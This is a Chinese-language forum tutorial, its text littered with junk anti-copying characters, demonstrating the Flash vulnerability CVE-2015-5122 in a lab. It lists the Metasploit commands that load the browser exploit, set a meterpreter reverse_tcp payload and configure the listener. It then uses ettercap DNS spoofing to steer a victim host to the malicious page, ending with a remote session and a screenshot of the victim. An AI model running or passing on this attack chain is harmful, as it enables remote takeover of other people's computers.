9 L, e8 A8 i3 h! _7 N
二、cve2015-5122漏洞实例演示虚拟机 . A' W, [$ t( t- S0 S
; q2 Q5 i% F; u: A( V
. C) P" l2 G. _ 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 0 V) R5 n- b! y. o
" J$ p4 p2 U! ]" j
9 Q2 k @6 b( p, Z
search cve-2015-5122如图: 6 a1 q. v% U. P2 e# }
. c% I2 r0 d; i: `' q4 o
D: ?6 y/ p4 z4 K
- E- D& w4 B6 {8 q5 B9 A! t & Q+ Y8 c4 E: k! X/ D
6 v( _3 R. N9 ~ f 下面我们敲如下命令:
' D+ M8 a' N: B9 R) K* I
3 P0 q( L# i" h M: _4 ]$ W; w6 D% C" L4 r! n9 C ~, l( y$ }. C3 f
use exploit/multi/browser/adobe_flash_opaque_background_uaf . _% S) V* W" z0 Z
8 X# x J& m3 T4 I% z! ]
" m8 k5 m) ~4 k- | set PAYLOAD windows/meterpreter/reverse_tcp
* l# B* Q; O: D
~, R0 D# L) M* s* h% B& R* l3 C$ [, F
$ p. R$ D- q- ^ set LHOST 192.168.0.109 2 x5 W" U7 @! x* N- G& Q. M
1 E% ~, z3 T3 u- @- r9 Z: q
# e$ d* d+ u6 k( a# s/ r
set URIPATH / /*根目录*/
8 Q% G6 g3 L' N3 n0 T 1 O9 x3 D' M) o2 l' R- {. L( f
) e1 s+ b/ [, C9 c2 x: q set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
5 Y, j5 |9 n' @! N 0 J7 N; }- D, t* u& I, P
. N4 V4 H6 x9 H! B. e+ m9 \+ a
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 - `3 K0 R- [5 o2 V$ x" p
, h4 x, X3 O( s Q0 D
2 r8 k& d4 H7 {' Y3 Z
然后show options如图:
) U8 {- j5 h$ Y n # {4 ?$ N* R% T8 n# G$ r
; T5 D/ o$ a4 e% i: N" ^/ S) U % n4 X( ^) x8 s' ?) @
d- N* h9 f Z1 s) z( w8 g, d8 d5 q" V" L: }" j' _
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
# \; E, P+ l' g! m( A + w. z c9 z+ D0 Y- w' O5 E
0 e- x7 s, s# B* I! N
! O8 A& s& i- ` 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 7 N7 T$ l- }6 H
1 ~9 A9 O4 J9 q8 Z- G+ H
# @. D/ D$ k$ ~0 G/ k
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf & c c' M8 Y. k* W) m
" x/ a- V. ~3 }- X8 m$ v- s, p; ]; {, @- [4 @+ l$ ` g
) H% t ^3 K! r0 ?5 `2 s* a/ H # W2 m/ _* u% X* ]+ P% P5 x
+ h2 Z N, p# c+ Q
成功了,这时候我们断开ettercap,如图: 4 N; u) Z5 M2 Q9 `
. T. m4 M5 Z3 d) w
c! V: O& n" l ! R1 D8 b9 _% q5 V5 L8 |7 R
, s0 c: ~4 G4 B
0 A% _. _! |2 F; c Screenshot如图:
- t* w) Y4 k" Y' M8 l& I6 \0 v8 T% i
_7 ]( e5 T! w5 Q( V$ e/ s7 c
/ r; v/ W5 O: z* }! G * q- Q; U# {- K% h' W( H
7 T8 R# S5 @$ M5 x( A
$ ?3 Z9 a' V2 Y3 T# B
. O8 Q1 S* s; w: S* D: j |